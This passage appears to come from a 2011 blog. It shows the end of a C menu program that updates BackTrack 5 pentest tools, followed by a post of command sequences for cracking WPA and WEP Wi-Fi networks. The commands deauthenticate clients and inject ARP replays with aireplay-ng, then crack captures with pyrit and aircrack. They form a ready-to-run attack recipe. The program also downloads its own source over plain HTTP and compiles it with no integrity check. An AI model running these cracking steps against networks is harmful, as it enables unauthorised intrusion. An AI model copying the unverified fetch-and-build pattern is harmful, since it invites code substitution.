    else {
        printf(" [>] Failed to update Nikto.\n");
        usleep(TIME);
    }
}

void sqlmap(void)
{
    printf(" [>] Updating Sqlmap, please wait.\n");
    usleep(TIME);
    printf("\n");
    if (system("cd /pentest/database/sqlmap/ && svn up --trust-server-cert --non-interactive") == 0) {
        printf(" [>] Sqlmap updated successfully!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update SQLmap.\n");
        usleep(TIME);
    }
}

void fasttrack(void)
{
    printf(" [>] Installing/Updating Fasttrack, please wait.\n");
    usleep(TIME);
    printf("\n");
    system("apt-get -y install fasttrack");
    if (system("cd /pentest/exploits/fasttrack/ && ./fast-track.py -c 1") == 0) {
        printf(" [>] Fasttrack  updated successfully!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update Fasttrack.\n");
        usleep(TIME);
    }
}

void pyrit(void)
{
    printf(" [>] Checking to see if pyrit is installed.\n");
    usleep(TIME);
    printf("\n");
    if (system("pyrit > /dev/null") == 0) {
        printf(" [>] Pyrit installed!\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Installing Pyrit, please wait.\n");
        usleep(TIME);
        system("apt-get -y install libssl-dev scapy python-dev");
        system("svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn");
        system("cd pyrit_svn/pyrit && python setup.py build && python setup.py install");
        system("rm -rf pyrit_svn");
        printf(" [>] Pyrit installed successfully!\n");
    }
}

void nmap(void)
{
    printf(" [>] Updating Nmap Fingerprints, please wait.\n");
    usleep(TIME);
    if (system("wget http://nmap.org/svn/nmap-os-db -O /usr/local/share/nmap/nmap-os-db") == 0) {
        printf(" [>] Nmap updated successfully!\n");
        printf("\n");
        usleep(TIME);
    }
    else {
        printf(" [>] Failed to update nmap!\n");
        usleep(TIME);
    }
}

/* Self-update: fetches the source over plain HTTP and compiles it without any
 * integrity check, so anything on the network path could substitute the code. */
void update(void)
{
    printf(" [>] Updating the evil script.\n");
    usleep(TIME);
    printf("\n");
    system("rm -rf backtrack5_update.c");
    system("wget http://sickness.tor.hu/wp-content/uploads/2011/06/backtrack5_update.c");
    system("gcc -o backtrack5_update backtrack5_update.c");
    printf("\n");
    printf("Update successfully, now please run the script again!\n");
    exit(0);
}

void changelog(void)
{
    system("cd /tmp && wget http://sickness.tor.hu/wp-content/uploads/2011/06/changelog.txt -o /dev/null");
    system("less /tmp/changelog.txt");
    system("rm -rf /tmp/changelog.txt");
}

void tryharder(void)
{
    printf(" [] Wrong choice, exiting now ... \n");
    usleep(TIME);
    exit(EXIT_SUCCESS);
}

/* Each menu re-enters itself after a task and returns to main() on "Back";
 * the break after each case makes that flow explicit. */
void menu_exploit(void)
{
    char ex_choice[4];
    int ex_var;

    printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
    printf("        |B||a||c||k||t||r||a||c||k| |5| |u||p||d||a||t||e|\n");
    printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
    printf("   Section: EXPLOIT TOOLS\n");
    printf("\n");
    printf(" [>] 1. Metasploit Framework.\n");
    printf(" [>] 2. Exploit-db.\n");
    printf(" [>] 3. SET - Social Engineering Toolkit.\n");
    printf(" [>] 4. Update all.\n");
    printf(" [>] 5. Back.\n");
    printf("\n");
    printf(" [>] Enter your choice: ");

    fgets(ex_choice, sizeof(ex_choice), stdin);
    ex_var = atoi(ex_choice);

    switch (ex_var) {
        case 1: msf(); menu_exploit(); break;
        case 2: exploit_db(); menu_exploit(); break;
        case 3: set(); menu_exploit(); break;
        case 4: msf(); exploit_db(); set(); menu_exploit(); break;
        case 5: main(); break;
        default: tryharder(); break;
    }
}

void menu_wireless(void)
{
    char w_choice[4];
    int w_var;

    printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
    printf("        |B||a||c||k||t||r||a||c||k| |5| |u||p||d||a||t||e|\n");
    printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
    printf("                        Section: WIRELESS & TELEPHONY\n");
    printf("\n");
    printf(" [>] 1. Aircrack-ng and Airdrop.\n");
    printf(" [>] 2. WarVox.\n");
    printf(" [>] 3. Giskismet.\n");
    printf(" [>] 4. Update all.\n");
    printf(" [>] 5. Back.\n");
    printf("\n");
    printf(" [>] Enter your choice: ");

    fgets(w_choice, sizeof(w_choice), stdin);
    w_var = atoi(w_choice);

    switch (w_var) {
        case 1: aircrack(); menu_wireless(); break;
        case 2: warvox(); menu_wireless(); break;
        case 3: giskismet(); menu_wireless(); break;
        case 4: aircrack(); warvox(); giskismet(); menu_wireless(); break;
        case 5: main(); break;
        default: tryharder(); break;
    }
}

void menu_web_db(void)
{
    char wd_choice[4];
    int wd_var;

    printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
    printf("        |B||a||c||k||t||r||a||c||k| |5| |u||p||d||a||t||e|\n");
    printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
    printf("                        Section: WEB & DATABASE\n");
    printf("\n");
    printf(" [>] 1. W3AF.\n");
    printf(" [>] 2. Nikto.\n");
    printf(" [>] 3. Sqlmap.\n");
    printf(" [>] 4. Update all.\n");
    printf(" [>] 5. Back.\n");
    printf("\n");
    printf(" [>] Enter your choice: ");

    fgets(wd_choice, sizeof(wd_choice), stdin);
    wd_var = atoi(wd_choice);

    switch (wd_var) {
        case 1: w3af(); menu_web_db(); break;
        case 2: nikto(); menu_web_db(); break;
        case 3: sqlmap(); menu_web_db(); break;
        case 4: w3af(); nikto(); sqlmap(); menu_web_db(); break;
        case 5: main(); break;
        default: tryharder(); break;
    }
}

void menu_other(void)
{
    char o_choice[4];
    int c_var;

    printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
    printf("        |B||a||c||k||t||r||a||c||k| |5| |u||p||d||a||t||e|\n");
    printf("        +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
    printf("                        Section: OTHER\n");
    printf(" [>] 1. Nessus.\n");
    printf(" [>] 2. Fasttrack.\n");
    printf(" [>] 3. Pyrit.\n");
    printf(" [>] 4. Nmap.\n");
    printf(" [>] 5. Update all.\n");
    printf(" [>] 6. Back.\n");
    printf("\n");
    printf(" [>] Enter your choice: ");

    fgets(o_choice, sizeof(o_choice), stdin);
    c_var = atoi(o_choice);

    switch (c_var) {
        case 1: nessus(); menu_other(); break;
        case 2: fasttrack(); menu_other(); break;
        case 3: pyrit(); menu_other(); break;
        case 4: nmap(); menu_other(); break;
        case 5: nessus(); fasttrack(); pyrit(); nmap(); menu_other(); break;
        case 6: main(); break;
        default: tryharder(); break;
    }
}

int main(void)
{
    char choice[4];
    int choice_var;
    check_internet();

    printf(" +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
    printf(" |B||a||c||k||t||r||a||c||k| |5| |u||p||d||a||t||e|\n");
    printf(" +-++-++-++-++-++-++-++-++-+ +-+ +-++-++-++-++-++-+\n");
    printf("                        Section: MAIN\n");
    printf(" [>] 1. Update and clean Backtrack.\n");
    printf(" [>] 2. Exploit tools.\n");
    printf(" [>] 3. Wireless & Telephony.\n");
    printf(" [>] 4. Web & Database.\n");
    printf(" [>] 5. Others.\n");
    printf(" [>] 6. Update all.\n");
    printf(" [>] 7. Update script.\n");
    printf(" [>] 8. Changelog.\n");
    printf(" [>] 9. Exit.\n");
    printf("\n");
    printf(" [>] Enter your choice: ");

    fgets(choice, sizeof(choice), stdin);
    choice_var = atoi(choice);

    switch (choice_var) {
        case 1: backtrack_update(); main(); break;
        case 2: menu_exploit(); main(); break;
        case 3: menu_wireless(); main(); break;
        case 4: menu_web_db(); main(); break;
        case 5: menu_other(); main(); break;
        case 6: backtrack_update(); exploit_db(); set(); warvox(); aircrack(); giskismet(); msf(); nessus(); w3af(); nikto(); sqlmap(); fasttrack(); pyrit(); nmap(); main(); break;
        case 7: update(); break;
        case 8: changelog(); main(); break;
        case 9: exit(1);
        default: tryharder(); break;
    }

    return 0;
}

Sunday, July 3, 2011

cracking wpa with airmon & pyrit

airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 11 -w erfan --bssid mon0
aireplay --deauth 0 -a bssid -c client mon

pyrit eval
pyrit -i pass.lst import_passwords
pyrit -e j2neonAP create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o wpadb export_hashdb

aircrack -r wpadb erfan01.cap

cracking wep with client

airmon-ng start [device]
airodump-ng mon0
airodump-ng -c [channel] -w [erfan] --bssid [bssid] mon0
aireplay-ng -1 0 -a [bssid] -h Assoc-Station-mac -e [essid] mon0
aireplay-ng -3 -b [bssid] -h Assoc-Station-mac mon0
aircrack-ng -b [bssid] [erfan]-01.cap